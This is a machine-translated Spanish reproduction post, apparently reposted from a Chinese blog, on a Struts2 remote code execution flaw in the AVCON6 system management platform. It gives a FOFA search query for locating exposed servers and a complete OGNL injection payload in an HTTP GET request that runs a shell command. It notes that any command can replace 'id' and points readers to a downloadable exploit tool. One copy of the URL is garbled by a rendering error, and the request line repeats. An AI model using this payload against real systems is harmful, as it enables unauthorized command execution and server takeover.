La plataforma de gestión del sistema AVCON6 de Warburg Pincus Information Technology Co., Ltd. tiene una vulnerabilidad de ejecución remota de código strut2

La plataforma de gestión del sistema AVCON6 de Warburg Pincus Information Technology Co., Ltd. tiene una vulnerabilidad de ejecución remota de código strut2

Descargo de responsabilidad: No utilice las tecnologías relevantes en este artículo para realizar pruebas ilegales. Cualquier consecuencia y pérdida directa o indirecta causada por la difusión y el uso de la información o las herramientas proporcionadas en este artículo correrán a cargo del propio usuario. Las consecuencias adversas tienen nada que ver con el autor del artículo. Este artículo es sólo para fines educativos.

1. Introducción a la plataforma de gestión del sistema AVCON6 de Warburg Pincus Information Technology Co., Ltd.

Búsqueda de cuenta oficial de WeChat: Biblioteca de reaparición de vulnerabilidades de Nanfeng
Este artículo se publicó por primera vez en la cuenta oficial de la Biblioteca de reproducción de vulnerabilidades de Nanfeng

Warburg Pincus Information Technology Co., Ltd. es un proveedor de sistemas de comunicación multimedia y soluciones para ciudades inteligentes. La plataforma de gestión del sistema AVCON6 de Warburg Pincus Information Technology Co., Ltd. tiene una vulnerabilidad de ejecución remota de código Strut2. Permita que los atacantes ejecuten comandos de forma remota y obtengan privilegios de servidor.

2. Descripción de la vulnerabilidad

Warburg Pincus Information Technology Co., Ltd. es un proveedor de sistemas de comunicación multimedia y soluciones para ciudades inteligentes. La plataforma de gestión del sistema AVCON6 de Warburg Pincus Information Technology Co., Ltd. tiene una vulnerabilidad de ejecución remota de código Strut2. Permita que los atacantes ejecuten comandos de forma remota y obtengan privilegios de servidor.

ID CVE:
ID CNNVD:
ID CNVD: CNVD-2020-30193

3. Afecta la versión

AVCON6
La plataforma de gestión del sistema AVCON6 de Warburg Pincus Information Technology Co., Ltd. tiene una vulnerabilidad de ejecución remota de código strut2

4. declaración de consulta fofa

título = "AVCON"

5. Recurrencia de la vulnerabilidad

漏洞链接: http://127.0.0.1:8800/login.action?redirect: Error de análisis de KaTeX: esperado '}', obtuvo 'EOF' al final de la entrada: …ction?redirect: {%23a%3d(new% 20java.lang.ProcessBuilder(new%20java.lang.String[]{“id”})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(% 23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony .xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

Paquete de vulnerabilidad:

GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{"id"})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}%20GET%20/login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{"id"})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: 127.0.0.1:8800
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

El comando id se ejecuta con éxito aquí, o puede cambiar el comando id al comando que desea ejecutar
La plataforma de gestión del sistema AVCON6 de Warburg Pincus Information Technology Co., Ltd. tiene una vulnerabilidad de ejecución remota de código strut2

También es posible utilizar la herramienta de vulnerabilidad de ejecución de comandos strut2 en el mercado.
La plataforma de gestión del sistema AVCON6 de Warburg Pincus Information Technology Co., Ltd. tiene una vulnerabilidad de ejecución remota de código strut2

6.POC&EXP

Siga la cuenta pública Nanfeng Vulnerability Reproduction Library y responda Vulnerability Reproduction 28
para obtener la dirección de descarga de la herramienta de utilización del comando strut2 mencionada anteriormente:
La plataforma de gestión del sistema AVCON6 de Warburg Pincus Information Technology Co., Ltd. tiene una vulnerabilidad de ejecución remota de código strut2

7. Opiniones de rectificación

El fabricante aún no ha proporcionado una solución de reparación; preste atención al sitio web del fabricante para obtener actualizaciones oportunas: http://www.avcon.com.cn/

8. Revisión pasada

Supongo que te gusta

Origin blog.csdn.net/nnn2188185/article/details/130478161
Recomendado
Clasificación